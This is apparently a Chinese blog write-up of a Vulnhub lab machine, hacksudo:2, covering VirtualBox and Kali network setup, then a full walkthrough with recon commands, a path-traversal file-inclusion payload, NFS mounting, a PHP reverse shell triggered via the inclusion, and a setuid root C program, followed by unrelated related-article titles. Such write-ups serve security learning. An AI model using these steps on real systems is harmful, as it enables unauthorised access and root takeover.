kali1攻击机ip:192.168.181.129
kali2攻击机ip:192.168.56.107

目录

  • 靶场及kali网络配置
  • 靶场通关

靶场及kali网络配置

需要把靶机导入vbox才能有ip

下载地址: vbox下载

我的虚拟机原本配置是:kali机仅开启一个网络适配器,eth0,为nat模式,而且设置了静态ip

在hackable1中,我修改了网络配置
虚拟网络编辑器设置如下

kali再添加一个网络适配器,eth1,并设置为桥接模式

vbox靶机网络配置如下

这样一来,靶机就有一个ip了

kali的eth1和靶机eth0就在同一个网络了,可以互相通信

这样配置短时间可以,但是后面我发现,把kali挂起了一个晚上,第二天恢复状态后发现我的静态ip被修改了,不知道是不是因为多了个网络适配器的原因

而且如果要反弹shell,监听端口开启是在kali默认的eth0端口上,两个eth0的ip不在同一个网络中,因为网络隔离的存在,一般情况下无法连接成功(反正我不会搞)

所以在打hackable2的过程中,使用原kali打了一半之后,最后还是选择再安装一个kali2=_=

所以我推荐之间在一开始就把kali网络配置好,我的配置如下,仅供参考

靶机和虚拟网络编辑器的配置和上述一致
kali2配置,nat模式使用dhcp分配ip,具体ip信息文章里有介绍

好了,配置部分结束,开始打靶机

靶场通关

这部分是使用的是原kali

主机发现,指定网卡扫描

arp-scan -I eth1 -l

端口扫描

nmap -sS -p- -T5 -A 192.168.56.105

开启了80端口http服务,1337ssh服务,2049nfs服务;

目录扫描

 dirb http://192.168.56.105

上面的文件我全翻了一遍,有图片有歌,就是没啥有用的

加上后缀再扫一次

 dirb http://192.168.56.105 -X .txt,.php

扫出来一个file.php

上面飘着一行字,显示有文件包含,很可能就是这个url跟着某个参数

wfuzz探测一下

wfuzz  --hw 14  -w /home/user/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt   -u http://192.168.56.105/file.php?FUZZ

啥也没有,而且全返回200,证明很大可能单FUZZ一个参数回显没有变化,需要包含一个正确文件返回才能有不同回显

尝试包含一个存在的文件

wfuzz  --hw 14  -w /home/user/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt   -u http://192.168.56.105/file.php?FUZZ=../.
./../etc/passwd

成功测试出参数file

有文件包含漏洞了,现在需要找一个上传文件的地方

nmap扫出来靶机开启了nfs

NFS

NFS是一种基于TCP/IP 传输的网络文件系统协议。通过使用NFS协议,客户机可以像访问本地目录一样访问远程服务器中的共享资源
在Centos 7系统中,需要安装nfs-utils、 rpcbind
软件包来提供NFS共享服务,前者用于NFS共享发布和访问,后者用于RPC支持。
NFS服务器可以让PC将网络中的NFS服务器共享的目录挂载到本地端的文件系统中,而在本地端的系统中来看,那个远程主机的目录就好像是自己的一个磁盘分区

查看服务器发布的NFS共享目录

showmount -e 192.168.56.105

/将NFS服务端192.168.56.105下的共享目录/mnt/nfs挂载到本机的nfs下

mount -t nfs 192.168.56.105:/mnt/nfs ./nfs

进入nfs目录就能查看共享目录里发布的文件了

尝试上传反弹shell,这里我使用的是msf生成的反弹shell

cp /home/user/myshell/shell.php  ./shell.php

赋予文件最高权限

chmod 777 shell.php

没成功,甚至一点反应都没有;


换个反弹shell脚本试试,使用kali自带的反弹shell脚本

cp /usr/share/webshells/php/php-reverse-shell.php  ./shell.php

这里要修改为kali的ip和nc监听的端口

不然就会出现这个报错

WARNING: Failed to daemonise. This is quite common and not fatal.Connection refused (111)

还是不行,原来是因为kali和靶机不在同一个网络里面;

路由器具有防火墙,会阻止所有传入连接(但是听说可以启用转发,不知道仅主机模式可不可以,我现在还搞不定,先放一放),我真是把所有坑踩了个遍=_=

最后没办法了,我就重新弄了一台kali的虚拟机(kali2),eth0为桥接网卡,这样默认ip就是192.168.56.0/24网段的了

(要是网卡没有ip可以试试执行/sbin/dhclient

在kali2里面打开nc监听

浏览器重新访问 http://192.168.56.105/file.php?file=../../../../mnt/nfs/shell.php

终于连上了

弄个回显 python3 -c 'import pty;pty.spawn("/bin/bash")'\;

既然可以上传文件,那我们直接上传提权文件就好了

写一个c语言提权脚本

#include<stdlib.h>
#include<unistd.h>int main()
{setuid(0);
system("id");
system("/bin/bash");
}

编译

 gcc getroot.c -o getroot

chmod 777 getroot

加上suid权限

chmod +s getroot

进入/mnt/nfs目录./getroot执行提权代码

成功提权,得到flag

o了

hacksudo:2 (HackDudo) vulnhub靶场(NFS,vbox靶场环境配置)相关推荐

  1. VulnHub渗透测试实战靶场 - Odin:1

    VulnHub渗透测试实战靶场 - Odin:1 题目描述 环境下载 NULLY CYBERSECURITY: 1靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 题目描述 Odin v ...

  2. VulnHub渗透测试实战靶场 - POTATO (SUNCSR): 1

    VulnHub渗透测试实战靶场 - POTATO(SUNCSR): 1 环境下载 POTATO (SUNCSR): 1靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 环境下载 戳此进行 ...

  3. VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE

    VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE 环境下载 THE ETHER: EVILSCIENCE靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 ...

  4. VulnHub渗透测试实战靶场-HA: FORENSICS

    VulnHub渗透测试实战靶场-HA: FORENSICS 题目描述 环境下载 HA: FORENSICS靶机搭建 渗透测试 信息搜集 Flag获取 Flag-1 Flag-2 Flag-3 Flag ...

  5. VulnHub渗透测试实战靶场笔记(持续更新)

    靶机(一)----Breach1.0 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战. VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网 ...

  6. 红队渗透靶场之W1R3S靶场(超详细!)

    W1R3S考察知识 nmap的基本使用 目录爆破工具的使用 CMS漏洞的利用 Linux用户的简单提权 W1R3S靶场搭建 W1R3S靶场下载地址: https://download.vulnhub. ...

  7. CTFweb相关靶场推荐与环境配置

    ps:国庆假期少事情多就不更新了 今天来一波猛的 想起来没有给大家推荐过实战的平台 今天来安利一波 这篇很长 相比上一篇sqlmap的配置而言内容很多 有问题的小伙伴欢迎留言哦 在线练习平台 bugk ...

  8. 使用APMServ搭建DVWA靶场、sqli-labs靶场——超详细

    文章目录 前言 一.搭建环境(APMServ) 1.安装APMServ 2.配置MySQL数据库 ①管理msyql数据库 ②登录(默认密码为空) ③选择mysql数据库 ④执行sql语句 ⑤重启APM ...

  9. linux ubuntu 安装samba ftp nfs tftp,Ubuntu配置TFTP和NFS和samba服务配置.doc

    Ubuntu配置TFTP和NFS和samba服务配置 配置tftp服务的步骤: 1.安装相关软件包:tftpd(服务端),tftp(客户端),xinetd sudo apt-get install t ...

最新文章

  1. 牛逼,国产开源的远程桌面火了,只有9MB,支持自建中继器!
  2. 学 JavaScript 伤不起……| 每日趣闻
  3. Sql Server截断日志(转)
  4. HIVE的安装配置、mysql的安装、hive创建表、创建分区、修改表等内容、hive beeline使用、HIVE的四种数据导入方式、使用Java代码执行hive的sql命令
  5. latex绘图笔记(一)
  6. 浪潮世科和浪潮软件什么关系_社交图形浪潮
  7. html适配Anroid手机
  8. 代替嵌套循环java_蓝石榴_个人博客_Java中for循环嵌套的替换优化
  9. 架构师进阶:Linux进程间如何共享内存?
  10. PHP学习笔记1:基础知识快速浏览
  11. 三菱伺服驱动器说明书_张家港市HG-KN13J-S100三菱伺服控制器
  12. zebradesigner2教程_zebradesigner pro 2中文版-斑马条码打印机软件下载 附带安装教程 - 安下载...
  13. 猿创征文|2022全球程序员薪资排行一览
  14. SylixOS学习二—— SylixOS启程之旅_SylixOS 系统概览
  15. 前端有哪些好的学习网站?
  16. fir滤波器算法c语言程序,FIR滤波器C语言代码
  17. 从零开始 | 原生微信小程序开发(二)
  18. 切绳子(二分,c语言)
  19. element布局容器大小_element中el-container容器与div布局区分详解
  20. 北京最大废品集散地面临拆迁 曾登上时代周刊

热门文章

  1. H264的基本原理(二)------ H264编码原理
  2. 图像处理中几何畸变校正,图像纠正的方法有哪些
  3. 【sass】安装及入门教程
  4. wordpress移动_如何在移动设备上隐藏WordPress小部件(易于初学者使用)
  5. Ceres求解直接法BA实现自动求导
  6. 解决k8s Error registering network: failed to acquire lease: node “master“ pod cidr not assigne
  7. 2021年熔化焊接与热切割试题及解析及熔化焊接与热切割模拟考试题
  8. 杆单元四节点MATLAB,平面四节点等参单元matlab实现
  9. 【QCA6174】SDX12 WiFi QCA6174 bdwlan30.bin和bdwlan30.txt相互转化操作说明
  10. 微软首款内置中文Cortana智能手机大陆上市